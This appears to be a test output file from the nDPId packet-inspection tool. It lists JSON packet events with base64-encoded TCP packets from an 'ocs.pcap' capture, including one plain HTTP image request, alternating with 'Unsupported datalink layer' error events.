-00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":899,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD88QABABgMGwKi0ArL40NKmXgBQrzCn\/DkzU2ewEARAaFIAAAEBCAoANZjvGkFpcAEBBQo5M14\/OTNjqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":900,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843851} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":900,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD89QABABgL9wKi0ArL40NKmXgBQrzCn\/DkzU2fQEARA\/joAAAEBCAoANZj1GkFpcAEBBRI5M2kXOTNugzkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":901,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843852} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":901,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8+QABABgL8wKi0ArL40NKmXgBQrzCn\/DkzU2fQEARA+M4AAAEBCAoANZj1GkFpcAEBBRI5M2kXOTNz7zkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":902,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843926} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":902,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8\/QABABgL7wKi0ArL40NKmXgBQrzCn\/DkzWNPQEARu8yAAAAEBCAoANZj9GkFpfAEBBRI5M2kXOTNz7zkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported 
datalink layer","datalink":12,"packet_id":903,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843927} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":903,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9AQABABgMCwKi0ArL40NKmXgBQrzCn\/DkzY6uwEASbPH0AAAEBCAoANZj9GkFpfAEBBQo5M2kXOTNz7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":904,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843990} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":904,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9BQABABgMBwKi0ArL40NKmXgBQrzCn\/DkzY6uwEASbNwsAAAEBCAoANZkDGkFpfAEBBQo5M2kXOTN5Ww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":905,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843995} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":905,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9CQABABgMAwKi0ArL40NKmXgBQrzCn\/DkzY6uwEASbMZ8AAAEBCAoANZkDGkFpfAEBBQo5M2kXOTN+xw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":906,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844047} 
-00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":906,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9DQABABgL3wKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbhncAAAEBCAoANZkJGkFpfAEBBRI5M4mfOTOPCzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":907,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844055} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":907,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9EQABABgL2wKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbgQoAAAEBCAoANZkKGkFpfAEBBRI5M4mfOTOUdzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":908,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844085} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":908,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9FQABABgL1wKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbe5sAAAEBCAoANZkNGkFpfAEBBRI5M4mfOTOZ4zkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":909,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844095} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":909,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9GQABABgL0wKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbdi4AAAEBCAoANZkOGkFpfAEBBRI5M4mfOTOfTzkzaRc5M37H"} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":910,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844131} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":910,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9HQABABgLzwKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbcL8AAAEBCAoANZkRGkFpfAEBBRI5M4mfOTOkuzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":911,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844154} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":911,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9IQABABgLywKi0ArL40NKmXgBQrzCn\/DkzY6vQEASba1AAAAEBCAoANZkUGkFpfAEBBRI5M4mfOTOqJzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":912,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844195} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":912,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9JQABABgLxwKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbaZcAAAEBCAoANZkYGkFpfAEBBRI5M4mfOTOr3DkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":913,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844231} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":913,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9KQABABgL4wKi0ArL40NKmXgBQrzCn\/DkzfsewEATIyH4AAAEBCAoANZkbGkFpngEBBQo5M4mfOTOr3A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":914,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844268} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":914,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9LQABABgL3wKi0ArL40NKmXgBQrzCn\/DkzhDOwEAT1wtwAAAEBCAoANZkfGkFpowEBBQo5M4mfOTOr3A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":915,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844269} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":915,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9MQABABgMCwKi0ArL40NKmXgBQrzCn\/Dkzq9yAEAUjeP8AAAEBCAoANZkfGkFpow=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":916,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844329} 
-00533{"packet_event_id":1,"packet_event_name":"packet","packet_id":916,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":208,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":208,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAA0D9NQABABgJlwKi0ArL40NKmXgBQrzCn\/Dkzq9yAGAUj5DYAAAEBCAoANZklGkFpo0dFVCAvZGF0YV9wbGF0ZWZvcm1lL3Byb2dyYW0vMjQ2MzgvdHZfZGV0YWlsX2FmdGVyZWFydGh4dzAwNzk2MTVfY3NuX2I0MDljLmpwZyBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpIb3N0OiB3d3cub2NzLmZyDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":917,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844364} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":917,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9OQABABgMAwKi0ArL40NKmXgBQrzComDkzsUiAEAVQcrYAAAEBCAoANZkpGkFprQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":918,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844365} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":918,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9PQABABgL\/wKi0ArL40NKmXgBQrzComDkztrSAEAV9bR0AAAEBCAoANZkpGkFprQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":919,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844367} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":919,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9QQABABgL+wKi0ArL40NKmXgBQrzComDkzvCCAEAWqZ4QAAAEBCAoANZkpGkFprQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":920,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844402} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":920,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9RQABABgL9wKi0ArL40NKmXgBQrzComDkzwYyAEAXYYeQAAAEBCAoANZksGkFpsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":921,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844404} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":921,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9SQABABgL8wKi0ArL40NKmXgBQrzComDkzxviAEAYFXEoAAAEBCAoANZktGkFpsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":922,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844405} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":922,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9TQABABgL7wKi0ArL40NKmXgBQrzComDkzzGSAEAYyVrEAAAEBCAoANZktGkFpsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":923,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844407} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":923,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9UQABABgL6wKi0ArL40NKmXgBQrzComDkz0dCAEAZfURgAAAEBCAoANZktGkFpsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":924,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844707} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":924,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9VQABABgL5wKi0ArL40NKmXgBQrzComDkz1zyAEAaNS0QAAAEBCAoANZlLGkFpzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":925,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844788} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":925,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9WQABABgLswKi0ArL40NKmXgBQrzComDkz1zywEAaNzlAAAAEBCAoANZlTGkFpzAEBBQo5M+eAOTPs7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":926,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844864} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":926,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9XQABABgLrwKi0ArL40NKmXgBQrzComDkz3KiwEAa6yKIAAAEBCAoANZlaGkFp2gEBBQo5M+eAOTPs7A=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":927,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844866} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":927,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9YQABABgLqwKi0ArL40NKmXgBQrzComDkz4hSwEAbnwwkAAAEBCAoANZlaGkFp2gEBBQo5M+eAOTPs7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":928,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844907} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":928,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9ZQABABgLpwKi0ArL40NKmXgBQrzComDkz4hSwEAbnvZgAAAEBCAoANZlfGkFp2gEBBQo5M+eAOTPyWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":929,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844913} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":929,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9aQABABgLowKi0ArL40NKmXgBQrzComDkz4hSwEAbnuCwAAAEBCAoANZlfGkFp2gEBBQo5M+eAOTP3xA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":930,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844951} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":930,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9bQABABgLnwKi0ArL40NKmXgBQrzComDkz4hSwEAbnsrwAAAEBCAoANZljGkFp2gEBBQo5M+eAOTP9MA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":931,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845018} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":931,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9cQABABgLewKi0ArL40NKmXgBQrzComDkz4hTQEAbnFZkAAAEBCAoANZlqGkFp2gEBBRI5NAKcOTQICDkz54A5M\/0w"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":932,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845085} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":932,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9dQABABgLdwKi0ArL40NKmXgBQrzComDkz4hTQEAbnECYAAAEBCAoANZlxGkFp2gEBBRI5NAKcOTQNdDkz54A5M\/0w"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":933,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845125} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":933,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9eQABABgLcwKi0ArL40NKmXgBQrzComDkz4hTQEAbnCrYAAAEBCAoANZl1GkFp2gEBBRI5NAKcOTQS4Dkz54A5M\/0w"} -00171{"error_event_id":3,"error_event_name":"Unsupported 
datalink layer","datalink":12,"packet_id":934,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845159} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":934,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9fQABABgLjwKi0ArL40NKmXgBQrzComDkz\/TCwEAcUZnEAAAEBCAoANZl4GkFp+wEBBQo5NAKcOTQS4A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":935,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845192} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":935,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9gQABABgLuwKi0ArL40NKmXgBQrzComDk0EuCAEAdCDocAAAEBCAoANZl7GkFqAA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":936,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845276} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":936,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9hQABABgLhwKi0ArL40NKmXgBQrzComDk0EuCwEAdCL\/oAAAEBCAoANZmEGkFqAAEBBQo5NBhMOTQduA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":937,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845277} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":937,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9iQABABgLgwKi0ArL40NKmXgBQrzComDk0EuCwEAdCKo4AAAEBCAoANZmEGkFqAAEBBQo5NBhMOTQjJA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":938,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845304} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":938,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9jQABABgLfwKi0ArL40NKmXgBQrzComDk0EuCwEAdCJR8AAAEBCAoANZmHGkFqAAEBBQo5NBhMOTQokA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":939,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845306} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":939,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9kQABABgLewKi0ArL40NKmXgBQrzComDk0EuCwEAdCH7MAAAEBCAoANZmHGkFqAAEBBQo5NBhMOTQt\/A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":940,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845341} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":940,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9lQABABgLpwKi0ArL40NKmXgBQrzComDk0LfyAEAdv8yAAAAEBCAoANZmKGkFqDg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":941,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845343} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":941,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9mQABABgLowKi0ArL40NKmXgBQrzComDk0M2iAEAec7YcAAAEBCAoANZmKGkFqDg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":942,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845411} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":942,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9nQABABgLnwKi0ArL40NKmXgBQrzComDk0ONSAEAfJ5+QAAAEBCAoANZmRGkFqEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":943,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845412} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":943,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9oQABABgLmwKi0ArL40NKmXgBQrzComDk0PkCAEAf34kkAAAEBCAoANZmRGkFqEg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":944,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652846325} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":944,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9pQABABgLlwKi0ArL40NKmXgBQrzComDk0Q6yAEAgk3AIAAAEBCAoANZntGkFqZA=="} 
